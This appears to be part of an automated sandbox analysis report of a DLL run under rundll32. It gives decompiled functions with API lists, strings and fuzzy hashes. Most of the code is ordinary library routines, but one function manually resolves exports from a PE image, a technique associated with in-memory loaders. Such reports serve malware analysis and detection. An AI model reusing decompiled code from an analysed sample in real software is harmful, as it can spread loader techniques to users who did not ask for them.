						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E100199D4(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1005a760(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000D8AD
GetSystemMetrics.USER32 ref: 1000D8C5
GetSystemMetrics.USER32 ref: 1000D8CC

Strings

DISPLAY, xrefs: 1000D8E9
B, xrefs: 1000D88C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameters
String ID: B$DISPLAY
API String ID: 3136151823-3316187204
Opcode ID: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction ID: 9954a119ce47e65a3950f6e4b3e830268b9633322f26d87d987c4675ad6ec402
Opcode Fuzzy Hash: 8876a3cbcd016a78351f26f5d05056f9f81063dbdc410b1432d22438e2067453
Instruction Fuzzy Hash: 7C118F71600328ABEB11EF649C84B9F7EA8EF057D0B108066FD09AA14AD6719951CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 1000C570, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C570(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E1000DFD6(__ecx, __eflags, _t26) == 0) {
					_t10 = E1001040B(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E1000E426(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E100140D6(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 1000C5C0

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction ID: c36f5ccd8b34139a66e87801a9a5321a409f351d494de0105f07b228c10d2adb
Opcode Fuzzy Hash: 69ab62d90964fea0973c829bc4d4e68af8609d85649b9a8f255ba6de021e82f1
Instruction Fuzzy Hash: F4015E3820070AA7FA65DB258D45F5AB6E5EF056D2F214429F942F10B8CFB0FD91D560

Uniqueness

Uniqueness Score: -1.00%

Function 1000BC89, Relevance: 7.6, APIs: 5, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000BC89(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10057a08; // 0x4959db98
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E10017BF4(E10027F23, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E10009FA3(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E1000BC89(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10009CB7( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E100167D5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000BCA8
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
RegCloseKey.ADVAPI32(?), ref: 1000BD6B

Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
String ID:
API String ID: 301487041-0
Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013F9E, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10057a08; // 0x4959db98
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E100174D0(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
_memset.LIBCMT ref: 10013FE5
GetWindowTextA.USER32 ref: 10013FFF
lstrcmpA.KERNEL32(00000000,?), ref: 10014011
SetWindowTextA.USER32(?,?), ref: 1001401D

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010C0F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1001431B(__ebx, _t25, __ebp, 0xc);
				_push(E100100DE);
				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10014388(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
FreeLibrary.KERNEL32(?), ref: 10010C63

Strings

HtmlHelpA, xrefs: 10010C4D
hhctrl.ocx, xrefs: 10010C37

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100224E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100224E9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002bb98;
					_v28 =  *0x1002bb90;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE

Strings

KERNEL32, xrefs: 100224E9
IsProcessorFeaturePresent, xrefs: 100224F8

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681

Uniqueness

Uniqueness Score: -1.00%

Function 10002D50, Relevance: 6.4, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				signed short* _v36;
				intOrPtr _v40;
				void* _t79;
				void* _t119;

				_v40 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v12 = 0;
				_v16 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v16 + 4)) != 0) {
					_v8 = _v20 +  *_v16;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
							_v24 = 0;
							_v28 = 0;
							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t79 = E10001F70(_a8, _v20 +  *_v32);
								_t119 = _t119 + 8;
								if(_t79 != 0) {
									_v28 = _v28 + 1;
									_v32 = _v32 + 4;
									_v36 =  &(_v36[1]);
									continue;
								}
								_v12 =  *_v36 & 0x0000ffff;
								_v24 = 1;
								break;
							}
							if(_v24 != 0) {
								L17:
								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

APIs

SetLastError.KERNEL32(0000007F), ref: 10002D7F
SetLastError.KERNEL32(0000007F), ref: 10002DAB

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10023E83, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E10016E2B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10017D62(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
__isleadbyte_l.LIBCMT ref: 10023EE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100145B9, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
					_t70 = E100139DB(0x10058f44);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10016380(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000B510();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

APIs

__msize.LIBCMT ref: 1001464A
__msize.LIBCMT ref: 1001466D
_malloc.LIBCMT ref: 10014685
_malloc.LIBCMT ref: 1001469A

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
